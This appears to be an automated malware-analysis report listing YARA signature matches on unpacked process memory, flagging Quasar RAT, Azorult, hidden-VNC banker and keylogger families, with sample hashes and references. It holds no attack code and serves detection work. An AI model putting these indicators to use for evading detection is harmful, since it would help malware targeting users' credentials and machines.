Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
